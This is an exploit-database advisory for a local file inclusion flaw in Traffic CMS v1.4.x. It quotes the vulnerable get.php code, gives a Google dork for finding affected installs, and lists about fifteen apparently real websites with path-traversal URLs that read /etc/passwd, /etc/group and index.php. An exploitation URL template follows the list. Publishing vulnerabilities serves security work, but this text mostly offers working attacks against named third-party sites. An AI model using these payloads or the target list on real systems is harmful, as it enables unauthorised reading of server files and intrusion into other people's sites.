Traffic CMS v1.4.x => Local File Inclusion Vulnerability *youtube

2015-11-21 / 2015-11-22
Credit: KnocKout
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

Traffic CMS v1.4.x => Local File Inclusion Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com [~] Þeker Insanlar : ZoRLu, ( milw00rm.com ), Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, d4rkvisuaL, BlackEdition DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs, LordERROR ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Traffic CMS |~Affected Version : v1.4.x |~Software : http://www.trafficwebsites.co.uk/ - https://www.facebook.com/trafficwebsites |~RISK : Medium |~Google Keyword : inurl:/admin/media/get.php ( developable ) |~Tested On : [L] Kali Linux [R] Example sites #################### INFO ################################ makes it possible to read all the files from the local base. ####################################################### ### Error Line in 'get.php' ## <?php $ssl = true; $file = $_GET['f']; $path = UL_PATH; $docs = array('doc','docx','xls','xlsx','pdf','zip','txt','rtf','ppt','pptx'); if (file_exists($path.$file)) { $size = filesize($path.$file); $contents = file_get_contents($path.$file); $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo,$path.$file); finfo_close($finfo); if(in_array(file_ext($file), $docs)) .. ######################################################## Tested on; http://www.uha.lXondon/admin/media/get.php?f=../../etc/group https://www.unXlimitedshop.co.uk/admin/media/get.php?f=../../etc/group https://www.uXnlimitedshop.co.uk/admin/media/get.php?f=../index.php () http://www.ticktockrobotX.co.uk/admin/media/get.php?f=../../etc/group http://www.powerelectriXcservices.co.uk//admin/media/get.php?f=../../etc/group http://www.knighthoodXcorporate.com/admin/media/get.php?f=../../etc/group http://www.nexusdp.cXo.uk/admin/media/get.php?f=../../etc/group http://www.thespencXepractice.co.uk/admin/media/get.php?f=../../etc/group http://www.brightwXell.fr/admin/media/get.php?f=../../../../../etc/passwd http://www.brightXwell.co.uk/admin/media/get.php?f=../../../../../etc/passwd http://brightwell.Xes/admin/media/get.php?f=../../../../../etc/passwd http://www.brigXhtwell-inc.com/admin/media/get.php?f=../../../../../etc/passwd http://www.taXlbottype.co.uk/admin/media/get.php?f=../../../../../etc/passwd http://www.tXalbottype.co.uk/admin/media/get.php?f=../index.php http://www.Xweddinginateacup.co.uk/admin/media/get.php?f=../../../etc/group ############################################################ Exploitation; http://$VICTIM/admin/media/get.php?f=[Local Path] ############################################################

References:

https://www.youtube.com/watch?v=lNGiMa1yofY


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top